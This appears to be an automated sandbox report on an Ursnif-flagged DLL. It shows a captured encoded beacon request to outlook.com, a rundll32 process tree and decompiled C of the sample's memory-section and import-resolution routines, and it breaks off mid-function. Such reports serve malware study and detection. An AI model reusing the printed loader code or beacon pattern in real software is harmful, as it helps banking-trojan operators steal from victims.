                                                                                                              Jul 14, 2021 15:47:26.154158115 CEST1351OUTGET /grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow HTTP/1.1
                                                                                                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                              Accept-Language: en-US
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Host: outlook.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Jul 14, 2021 15:47:26.318327904 CEST1351INHTTP/1.1 301 Moved Permanently
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Location: https://outlook.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow
                                                                                                              Server: Microsoft-IIS/10.0
                                                                                                              request-id: e5b375e1-ab4a-b04b-d96a-87a09a6f4fed
                                                                                                              X-FEServer: MWHPR13CA0020
                                                                                                              X-RequestId: 04dd39db-fffd-4c97-b71e-7102df85c47b
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              X-FEServer: MWHPR13CA0020
                                                                                                              Date: Wed, 14 Jul 2021 13:47:25 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 0


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:15:46:03
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:loaddll32.exe 'C:\Users\user\Desktop\945.dll'
                                                                                                              Imagebase:0xf40000
                                                                                                              File size:116736 bytes
                                                                                                              MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392901039.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392858796.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392613103.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392808909.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392529075.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392768559.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.392386685.0000000002ED8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
                                                                                                              Imagebase:0xbd0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:04
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391141192.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391066845.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391440627.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390980633.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390863638.0000000004E68000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:09
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:13
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Sing
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:46:19
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray
                                                                                                              Imagebase:0xaf0000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:22
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                              Imagebase:0x7ff64d950000
                                                                                                              File size:823560 bytes
                                                                                                              MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:23
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2
                                                                                                              Imagebase:0x13d0000
                                                                                                              File size:822536 bytes
                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:47:25
                                                                                                              Start date:14/07/2021
                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2
                                                                                                              Imagebase:0x13d0000
                                                                                                              File size:822536 bytes
                                                                                                              MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >

                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6E24DD28), ref: 6E24E395
                                                                                                                • VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6E24DD8A), ref: 6E24E3CC
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6E24E42C
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E462
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E24E2B7), ref: 6E24E567
                                                                                                                • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E24E2B7), ref: 6E24E58E
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7), ref: 6E24E65B
                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,6E24E2B7,?), ref: 6E24E6B1
                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E24E6CD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.493360055.000000006E24D000.00000040.00020000.sdmp, Offset: 6E24D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2574235972-0
                                                                                                                • Opcode ID: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction ID: 863db9c4489dca3519704cf4dbbf7eebc93fc39de8d13dbb7e2a8b2ec6e0c9f5
                                                                                                                • Opcode Fuzzy Hash: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
                                                                                                                • Instruction Fuzzy Hash: 6ED15D72105701DFEB25EF58C888A71F7A6FF88310B194198ED299F25AD7B0A811EB74
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E6E1F1ADA(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct _FILETIME* _v16;
                                                                                                                				short _v60;
                                                                                                                				struct _FILETIME* _t14;
                                                                                                                				intOrPtr _t15;
                                                                                                                				long _t18;
                                                                                                                				void* _t19;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr _t31;
                                                                                                                				long _t32;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_t31 = __edx;
                                                                                                                				_t14 =  &_v16;
                                                                                                                				GetSystemTimeAsFileTime(_t14);
                                                                                                                				_push(0x192);
                                                                                                                				_push(0x54d38000);
                                                                                                                				_push(_v12);
                                                                                                                				_push(_v16);
                                                                                                                				L6E1F2130();
                                                                                                                				_push(_t14);
                                                                                                                				_v16 = _t14;
                                                                                                                				_t15 =  *0x6e1f4144;
                                                                                                                				_push(_t15 + 0x6e1f505e);
                                                                                                                				_push(_t15 + 0x6e1f5054);
                                                                                                                				_push(0x16);
                                                                                                                				_push( &_v60);
                                                                                                                				_v12 = _t31;
                                                                                                                				L6E1F212A();
                                                                                                                				_t18 = _a4;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t18 = 0x1000;
                                                                                                                				}
                                                                                                                				_t19 = CreateFileMappingW(0xffffffff, 0x6e1f4148, 4, 0, _t18,  &_v60); // executed
                                                                                                                				_t34 = _t19;
                                                                                                                				if(_t34 == 0) {
                                                                                                                					_t32 = GetLastError();
                                                                                                                				} else {
                                                                                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                						if(_t22 == 0) {
                                                                                                                							_t32 = GetLastError();
                                                                                                                							if(_t32 != 0) {
                                                                                                                								goto L9;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							 *_a8 = _t34;
                                                                                                                							 *_a12 = _t22;
                                                                                                                							_t32 = 0;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t32 = 2;
                                                                                                                						L9:
                                                                                                                						CloseHandle(_t34);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t32;
                                                                                                                			}














                                                                                                                0x6e1f1ada
                                                                                                                0x6e1f1ae3
                                                                                                                0x6e1f1ae7
                                                                                                                0x6e1f1aed
                                                                                                                0x6e1f1af2
                                                                                                                0x6e1f1af7
                                                                                                                0x6e1f1afa
                                                                                                                0x6e1f1afd
                                                                                                                0x6e1f1b02
                                                                                                                0x6e1f1b03
                                                                                                                0x6e1f1b06
                                                                                                                0x6e1f1b11
                                                                                                                0x6e1f1b18
                                                                                                                0x6e1f1b1c
                                                                                                                0x6e1f1b1e
                                                                                                                0x6e1f1b1f
                                                                                                                0x6e1f1b22
                                                                                                                0x6e1f1b27
                                                                                                                0x6e1f1b31
                                                                                                                0x6e1f1b33
                                                                                                                0x6e1f1b33
                                                                                                                0x6e1f1b47
                                                                                                                0x6e1f1b4d
                                                                                                                0x6e1f1b51
                                                                                                                0x6e1f1ba1
                                                                                                                0x6e1f1b53
                                                                                                                0x6e1f1b5c
                                                                                                                0x6e1f1b72
                                                                                                                0x6e1f1b7a
                                                                                                                0x6e1f1b8c
                                                                                                                0x6e1f1b90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x6e1f1b7c
                                                                                                                0x6e1f1b7f
                                                                                                                0x6e1f1b84
                                                                                                                0x6e1f1b86
                                                                                                                0x6e1f1b86
                                                                                                                0x6e1f1b67
                                                                                                                0x6e1f1b69
                                                                                                                0x6e1f1b92
                                                                                                                0x6e1f1b93
                                                                                                                0x6e1f1b93
                                                                                                                0x6e1f1b5c
                                                                                                                0x6e1f1ba9

                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?,?), ref: 6E1F1AE7
                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1F1AFD
                                                                                                                • _snwprintf.NTDLL ref: 6E1F1B22
                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,6E1F4148,00000004,00000000,?,?), ref: 6E1F1B47
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B5E
                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1F1B72
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B8A
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A), ref: 6E1F1B93
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F1ECE,0000000A,?), ref: 6E1F1B9B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1724014008-0
                                                                                                                • Opcode ID: 2f43388934aeb5e78839ff90ebc82ce8ad820876296e1a1b22a72e0aefceb890
                                                                                                                • Instruction ID: 196c37f7f7638380828ce3608de25c2963ff39fe568ce6a73e9410946051a6fd
                                                                                                                • Opcode Fuzzy Hash: 2f43388934aeb5e78839ff90ebc82ce8ad820876296e1a1b22a72e0aefceb890
                                                                                                                • Instruction Fuzzy Hash: 0C21A7B2600108FFDB00AFE4DC88E9E77F9EB55354F218025F616E7141E6309987ABE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • std::locale::locale.LIBCPMTD ref: 6E2117EB
                                                                                                                  • Part of subcall function 6E213B70: std::locale::_Init.LIBCPMT ref: 6E213B79
                                                                                                                • _setlocale.LIBCMT ref: 6E2117FE
                                                                                                                  • Part of subcall function 6E21C33C: _mbstowcs_s.LIBCMT ref: 6E21C362
                                                                                                                  • Part of subcall function 6E21C33C: __invoke_watson.LIBCMT ref: 6E21C37D
                                                                                                                  • Part of subcall function 6E21C33C: __calloc_crt.LIBCMT ref: 6E21C387
                                                                                                                • SetConsoleOutputCP.KERNELBASE(000004E3), ref: 6E21181E
                                                                                                                • GetModuleFileNameA.KERNELBASE(00000000,6E24CB58,000008C6,?,?,00000006,00000000), ref: 6E211850
                                                                                                                • SetConsoleCP.KERNELBASE(00000000), ref: 6E2118D9
                                                                                                                • _malloc.LIBCMT ref: 6E2118E4
                                                                                                                • GetCurrentDirectoryA.KERNEL32(000008C6,?,00000000), ref: 6E211A5B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492865179.000000006E200000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: Console$CurrentDirectoryFileInitModuleNameOutput__calloc_crt__invoke_watson_malloc_mbstowcs_s_setlocalestd::locale::_std::locale::locale
                                                                                                                • String ID:
                                                                                                                • API String ID: 1969868346-0
                                                                                                                • Opcode ID: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction ID: ebceaccab04a5794dd9ef913fa29cfff9e66d670fb69624f53b39fd53676240f
                                                                                                                • Opcode Fuzzy Hash: 408f8d4093a1337ca981f66069695afbfea8b1610b4988a164c07ea7b35782b8
                                                                                                                • Instruction Fuzzy Hash: 0D42487190461CDFCB19EFA8D988B9CBBF3FB5A309F10911AE525AB248E7706545CF20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E6E1F1996(intOrPtr* __eax, void** _a4) {
                                                                                                                				int _v12;
                                                                                                                				void* _v16;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				int _v28;
                                                                                                                				int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				int _v40;
                                                                                                                				int _v44;
                                                                                                                				void* _v48;
                                                                                                                				void* __esi;
                                                                                                                				long _t34;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				intOrPtr* _t48;
                                                                                                                
                                                                                                                				_t48 = __eax;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                				_v16 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_v48 = 0x18;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0x40;
                                                                                                                				_v40 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_v28 = 0;
                                                                                                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                				if(_t34 < 0) {
                                                                                                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                				} else {
                                                                                                                					 *_t48 = _v16;
                                                                                                                					_t39 = E6E1F1A44(_t48,  &_v12); // executed
                                                                                                                					_t47 = _t39;
                                                                                                                					if(_t47 != 0) {
                                                                                                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                					} else {
                                                                                                                						memset(_v12, 0, _v24);
                                                                                                                						 *_a4 = _v12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t47;
                                                                                                                			}


















                                                                                                                0x6e1f199f
                                                                                                                0x6e1f19a6
                                                                                                                0x6e1f19a7
                                                                                                                0x6e1f19a8
                                                                                                                0x6e1f19a9
                                                                                                                0x6e1f19aa
                                                                                                                0x6e1f19bb
                                                                                                                0x6e1f19bf
                                                                                                                0x6e1f19d3
                                                                                                                0x6e1f19d6
                                                                                                                0x6e1f19d9
                                                                                                                0x6e1f19e0
                                                                                                                0x6e1f19e3
                                                                                                                0x6e1f19ea
                                                                                                                0x6e1f19ed
                                                                                                                0x6e1f19f0
                                                                                                                0x6e1f19f3
                                                                                                                0x6e1f19f8
                                                                                                                0x6e1f1a33
                                                                                                                0x6e1f19fa
                                                                                                                0x6e1f19fd
                                                                                                                0x6e1f1a03
                                                                                                                0x6e1f1a08
                                                                                                                0x6e1f1a0c
                                                                                                                0x6e1f1a2a
                                                                                                                0x6e1f1a0e
                                                                                                                0x6e1f1a15
                                                                                                                0x6e1f1a23
                                                                                                                0x6e1f1a23
                                                                                                                0x6e1f1a0c
                                                                                                                0x6e1f1a3b

                                                                                                                APIs
                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1F19F3
                                                                                                                  • Part of subcall function 6E1F1A44: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E1F1A08,00000002,00000000,?,?,00000000,?,?,6E1F1A08,00000002), ref: 6E1F1A71
                                                                                                                • memset.NTDLL ref: 6E1F1A15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.492699725.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.492671611.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492733821.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492766888.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.492808881.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                • Opcode ID: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                                                                                • Instruction ID: 842ca67e5a2255276b21364cefc13e71ea2cda8668dd1fe99411d5d02e234caf
                                                                                                                • Opcode Fuzzy Hash: 3e47c97fc558f31320fa5412d1ad32580be8ebc7870d0b2d38d2d2664d752884
                                                                                                                • Instruction Fuzzy Hash: 4921F7B6E00209AFDB01DFE9C8849DEFBF9EF48354F104429E615F3211D731AA499BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E6E1F1BAC(void* __edi, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				_Unknown_base(*)()** _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed short _v24;
                                                                                                                				struct HINSTANCE__* _v28;
                                                                                                                				intOrPtr _t43;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				intOrPtr _t46;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				intOrPtr _t50;
                                                                                                                				signed short _t51;
                                                                                                                				_Unknown_base(*)()* _t53;
                                                                                                                				CHAR* _t54;
                                                                                                                				_Unknown_base(*)()* _t55;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t59;
                                                                                                                				_Unknown_base(*)()* _t60;
                                                                                                                				intOrPtr _t61;
                                                                                                                				intOrPtr _t65;
                                                                                                                				signed int _t68;
                                                                                                                				void* _t69;
                                                                                                                				CHAR* _t71;
                                                                                                                				signed short* _t73;
                                                                                                                
                                                                                                                				_t69 = __edi;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_t59 =  *0x6e1f4140;
                                                                                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                                                                                				if(_t43 != 0) {
                                                                                                                					_t45 = _t43 + __edi;
                                                                                                                					_v12 = _t45;
                                                                                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                					if(_t46 != 0) {
                                                                                                                						while(1) {
                                                                                                                							_t71 = _t46 + _t69;
                                                                                                                							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                							_v28 = _t47;
                                                                                                                							if(_t47 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                							 *_t71 = _t59 - 0x63699bc3;
                                                                                                                							_t49 = _v12;
                                                                                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                							_t50 =  *_t49;
                                                                                                                							if(_t50 != 0) {
                                                                                                                								L6:
                                                                                                                								_t73 = _t50 + _t69;
                                                                                                                								_v16 = _t61 + _t69;
                                                                                                                								while(1) {
                                                                                                                									_t51 =  *_t73;
                                                                                                                									if(_t51 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									if(__eflags < 0) {
                                                                                                                										__eflags = _t51 - _t69;
                                                                                                                										if(_t51 < _t69) {
                                                                                                                											L12:
                                                                                                                											_t21 =  &_v8;
                                                                                                                											 *_t21 = _v8 & 0x00000000;
                                                                                                                											__eflags =  *_t21;
                                                                                                                											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                										} else {
                                                                                                                											_t65 = _a4;
                                                                                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                												goto L12;
                                                                                                                											} else {
                                                                                                                												goto L11;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t51 = _t51 + _t69;
                                                                                                                										L11:
                                                                                                                										_v8 = _t51;
                                                                                                                									}
                                                                                                                									_t53 = _v8;
                                                                                                                									__eflags = _t53;
                                                                                                                									if(_t53 == 0) {
                                                                                                                										_t54 = _v24 & 0x0000ffff;
                                                                                                                									} else {
                                                                                                                										_t54 = _t53 + 2;
                                                                                                                									}
                                                                                                                									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                									__eflags = _t55;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_v20 = _t59 - 0x63699b44;
                                                                                                                									} else {
                                                                                                                										_t68 = _v8;
                                                                                                                										__eflags = _t68;
                                                                                                                										if(_t68 != 0) {
